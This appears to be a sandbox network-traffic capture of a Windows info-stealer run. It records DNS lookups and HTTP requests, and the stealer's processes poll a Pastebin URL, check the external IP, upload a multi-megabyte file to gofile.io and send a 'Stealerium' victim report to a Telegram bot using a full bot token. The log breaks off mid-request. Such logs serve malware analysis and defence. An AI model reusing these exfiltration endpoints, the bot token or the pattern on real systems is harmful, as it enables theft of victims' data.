Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: RBKpuwDT/YWfgwG4W8AsuSQPeugX4G4q8zZlE99ZwbAinHnmqkQaEMOO7anvei2VpXs6CA/awdJHGnQWou+CA6NR4tSEqkcjByP21firwkw=$BLAROY/ZVL+jHAmiziN4uQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453285a4bf65f-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: zIs4JPk3wtxaAosvsIAeaZXo4egjElrEmJMrFug7zZ4TwK2eO9aF9SEc1PQbpRGmq0NZLromgShU25iqXDOkg7Q4LLzHDhk6gPmLXs7kr88=$s254uNkQ51Cdy9LjW5HyOA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453285a5c6401-LHR
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.238
GET

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.84.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D31%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D31%2526e%253D1

chrome.exe

Remote address:

142.250.187.238:443

Request

GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.84.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D31%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D31%2526e%253D1 HTTP/2.0
host: clients2.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

clients2.googleusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.googleusercontent.com

IN A

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
GET

https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/2.0
host: clients2.googleusercontent.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

238.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.187.250.142.in-addr.arpa

IN PTR

Response

238.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f141e100net
DNS

33.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

33.200.250.142.in-addr.arpa

IN PTR

Response

33.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f11e100net
DNS

74.19.199.152.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.19.199.152.in-addr.arpa

IN PTR

Response
DNS

evcs-ocsp.ws.symantec.com

Remote address:

8.8.8.8:53

Request

evcs-ocsp.ws.symantec.com

IN A

Response

evcs-ocsp.ws.symantec.com

IN CNAME

mpki-ocsp.digicert.com

mpki-ocsp.digicert.com

IN CNAME

mpki-ocsp.edge.digicert.com

mpki-ocsp.edge.digicert.com

IN CNAME

fp3011.wpc.2be4.phicdn.net

fp3011.wpc.2be4.phicdn.net

IN CNAME

fp3011.wpc.phicdn.net

fp3011.wpc.phicdn.net

IN A

152.199.19.74
DNS

evcs-ocsp.ws.symantec.com

Remote address:

8.8.8.8:53

Request

evcs-ocsp.ws.symantec.com

IN A

Response

evcs-ocsp.ws.symantec.com

IN CNAME

mpki-ocsp.digicert.com

mpki-ocsp.digicert.com

IN CNAME

mpki-ocsp.edge.digicert.com

mpki-ocsp.edge.digicert.com

IN CNAME

fp3011.wpc.2be4.phicdn.net

fp3011.wpc.2be4.phicdn.net

IN CNAME

fp3011.wpc.phicdn.net

fp3011.wpc.phicdn.net

IN A

152.199.19.74
GET

http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D

Remote address:

152.199.19.74:80

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: evcs-ocsp.ws.symantec.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 3460
Cache-Control: public, max-age=300
Content-Type: application/ocsp-response
Date: Sat, 11 Jan 2025 10:46:47 GMT
Last-Modified: Sat, 11 Jan 2025 09:49:07 GMT
Server: ECAcc (lhc/7916)
X-Cache: HIT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 5
GET

http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D

Remote address:

152.199.19.74:80

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHX7Uch2jvaSe%2FQdoaI0odk%3D HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: evcs-ocsp.ws.symantec.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 3461
Cache-Control: public, max-age=300
Content-Type: application/ocsp-response
Date: Sat, 11 Jan 2025 10:46:48 GMT
Last-Modified: Sat, 11 Jan 2025 09:49:07 GMT
Server: ECAcc (lhc/7916)
X-Cache: HIT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 5
DNS

evcs-crl.ws.symantec.com

Remote address:

8.8.8.8:53

Request

evcs-crl.ws.symantec.com

IN A

Response

evcs-crl.ws.symantec.com

IN CNAME

crl-symcprod.digicert.com

crl-symcprod.digicert.com

IN CNAME

mpki-crl.edge.digicert.com

mpki-crl.edge.digicert.com

IN CNAME

fp3011.wpc.2be4.phicdn.net

fp3011.wpc.2be4.phicdn.net

IN CNAME

fp3011.wpc.phicdn.net

fp3011.wpc.phicdn.net

IN A

152.199.19.74
DNS

evcs-crl.ws.symantec.com

Remote address:

8.8.8.8:53

Request

evcs-crl.ws.symantec.com

IN A

Response

evcs-crl.ws.symantec.com

IN CNAME

crl-symcprod.digicert.com

crl-symcprod.digicert.com

IN CNAME

mpki-crl.edge.digicert.com

mpki-crl.edge.digicert.com

IN CNAME

fp3011.wpc.2be4.phicdn.net

fp3011.wpc.2be4.phicdn.net

IN CNAME

fp3011.wpc.phicdn.net

fp3011.wpc.phicdn.net

IN A

152.199.19.74
GET

http://evcs-crl.ws.symantec.com/evcs.crl

Remote address:

152.199.19.74:80

Request

GET /evcs.crl HTTP/1.1
Cache-Control: max-age = 3600
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 11 Dec 2024 14:52:25 GMT
User-Agent: Microsoft-CryptoAPI/10.0
Host: evcs-crl.ws.symantec.com

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Age: 3663
Cache-Control: public, max-age=3600
Content-Type: application/pkix-crl
Date: Sat, 11 Jan 2025 10:46:48 GMT
Last-Modified: Sat, 11 Jan 2025 09:45:45 GMT
Server: ECAcc (lhc/793B)
X-Cache: HIT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 1859
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: g8orSwiY6AbxTNsor72q6lKFWxcTg5nnMhRhK+k96Jx+TmJmVVTQ1ZL2knx7NUJfllYa4af8yNAArTkztEiY4XUyEKt2/6s3070kwJEOgKs=$pT0NC59ds4wBu91jnaFZeQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004533bc88a88bc-LHR
GET

http://icanhazip.com/

update.dotnet.exe

Remote address:

104.16.184.241:80

Request

GET / HTTP/1.1
Host: icanhazip.com

Response

HTTP/1.1 200 OK

Date: Sat, 11 Jan 2025 10:46:51 GMT
Content-Type: text/plain
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=RkUrmCBxlPBmMRtCFudAR7spQDLBD8uTe_Y04U2c6JE-1736592411-1.0.1.1-iLlGKyFEFYrp_pl9QBoK8PNawGNJ.uqu3QWd_VCHF._HxVH.dMFNtAEWER2NCmkWmnAxCu7ENCFLcvwglwcdVA; path=/; expires=Sat, 11-Jan-25 11:16:51 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 9004534d399d79b7-LHR
alt-svc: h3=":443"; ma=86400
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7328
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: OVZN7zdZZG8ttjIuDPKeDvO1T71fh+YM9FLY1yDkZ8E9//O2St0MAO9gs1tqlBeIPatUA/iZYx3eVg9HXBHXLKox1cULRJRE4z3hm2j59uw=$DZnwhOdEhdk16fNMCDNVzA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004534f38b6cd54-LHR
DNS

api.gofile.io

update.dotnet.exe

Remote address:

8.8.8.8:53

Request

api.gofile.io

IN A

Response

api.gofile.io

IN A

51.91.7.6

api.gofile.io

IN A

45.112.123.126
DNS

api.gofile.io

update.dotnet.exe

Remote address:

8.8.8.8:53

Request

api.gofile.io

IN A

Response

api.gofile.io

IN A

45.112.123.126

api.gofile.io

IN A

51.91.7.6
GET

https://api.gofile.io/servers

update.dotnet.exe

Remote address:

51.91.7.6:443

Request

GET /servers HTTP/1.1
Host: api.gofile.io
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.27.1
Date: Sat, 11 Jan 2025 10:46:53 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 523
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Credentials: true
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 0
ETag: W/"20b-8Prck69MKxYvbkPX/TBw9cOpEa8"
X-Robots-Tag: noindex, nofollow
DNS

store7.gofile.io

update.dotnet.exe

Remote address:

8.8.8.8:53

Request

store7.gofile.io

IN A

Response

store7.gofile.io

IN A

31.14.70.250
DNS

store7.gofile.io

update.dotnet.exe

Remote address:

8.8.8.8:53

Request

store7.gofile.io

IN A

Response

store7.gofile.io

IN A

31.14.70.250
POST

https://store7.gofile.io/uploadfile

update.dotnet.exe

Remote address:

31.14.70.250:443

Request

POST /uploadfile HTTP/1.1
Content-Type: multipart/form-data; boundary="c4e32a08-7e92-49ba-8bee-812dbffa3eaa"
Host: store7.gofile.io
Content-Length: 6596712
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.27.1
Date: Sat, 11 Jan 2025 10:46:56 GMT
Content-Type: application/json
Content-Length: 442
Connection: keep-alive
Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
DNS

6.7.91.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

6.7.91.51.in-addr.arpa

IN PTR

Response

6.7.91.51.in-addr.arpa

IN PTR

ns3147726 ip-51-91-7eu
DNS

250.70.14.31.in-addr.arpa

Remote address:

8.8.8.8:53

Request

250.70.14.31.in-addr.arpa

IN PTR

Response
DNS

250.70.14.31.in-addr.arpa

Remote address:

8.8.8.8:53

Request

250.70.14.31.in-addr.arpa

IN PTR

Response
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: BRbEQwabG3EgxpkKjFkU509F29ZMYVUud+X+d6HKo/KLoc7Vahg/zHN7Uiodod8JqQx4JSO08w+uqabPf9+rFZry6QAxpGacCu54tU/Qxbg=$yUHwqkMv5HI2PnmyRSeVEA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045362acd3633d-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: gactLIBhA3ExHh/wkdMOLdb/e63QtSAz1emzWTVwqKGuLtg/szp3BEve1vv7ZpLEZ4CL2rZR4wWCZutl/0Dnu/ihjnRGcmhUHK1cxnyfaQs=$ZuY4gypa/u4kBdDWNRXHxQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045375fdcf779f-LHR
GET

http://icanhazip.com/

update.dotnet.exe

Remote address:

104.16.184.241:80

Request

GET / HTTP/1.1
Host: icanhazip.com

Response

HTTP/1.1 200 OK

Date: Sat, 11 Jan 2025 10:46:58 GMT
Content-Type: text/plain
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=xrI9jT.UxugpfquDzITLDdhD8RdIMtQg74b36EJl3BA-1736592418-1.0.1.1-asOFcJjuaYPIKgLnwxpY9stD.l3aXF3fVt6kgwJjqVmGbfA9nY5wld4nDfB.YLC.2GQkf_TAsZ1XLu7iiNdOow; path=/; expires=Sat, 11-Jan-25 11:16:58 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 900453781decf65c-LHR
alt-svc: h3=":443"; ma=86400
GET

https://api.telegram.org/bot7204924753:AAFaqmmBR9ybp4-iE8BA2YCiFNUbOEd0Ljk/sendMessage?chat_id=8169552647&text=%60%60%60%0A%F0%9F%94%8D%20%2ASTEALERIUM%20v3.7.0%20REPORT%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%F0%9F%93%85%20Date%3A%202025-01-11%2010%3A46%3A31%20AM%0A%F0%9F%96%A5%EF%B8%8F%20System%3A%20Microsoft%20Windows%2010%20Enterprise%20LTSC%20%2864%20Bit%29%0A%F0%9F%91%A4%20Username%3A%20Admin%0A%F0%9F%92%BB%20CompName%3A%20HWXICMBQ%0A%F0%9F%8C%90%20Language%3A%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0A%F0%9F%9B%A1%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%0A%2AHARDWARE%20INFORMATION%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%E2%9A%A1%20CPU%3A%2012th%20Gen%20Intel%28R%29%20Core%28TM%29%20i5-12400%0A%F0%9F%8E%AE%20GPU%3A%20Microsoft%20Basic%20Display%20Adapter%0A%F0%9F%93%8A%20RAM%3A%2016157MB%0A%F0%9F%94%8B%20Power%3A%20NoSystemBattery%20%28100%25%29%0A%F0%9F%93%BA%20Screen%3A%201280x720%0A%F0%9F%93%B7%20Webcams%3A%200%0A%0A%2ANETWORK%20INFORMATION%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%F0%9F%8C%90%20Gateway%20IP%3A%2010.127.0.1%0A%F0%9F%94%92%20Internal%20IP%3A%2010.127.0.225%0A%F0%9F%8C%8D%20External%20IP%3A%20181.215.176.83%0A%0A%2ADETECTED%20DOMAINS%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20-%20%F0%9F%8F%A6%20Banking%20Services%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20Crypto%20Services%20%28No%20data%29%0A%20%20%20-%20%F0%9F%94%9E%20Adult%20Websites%20%28No%20data%29%0A%0A%2ABROWSER%20DATA%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%2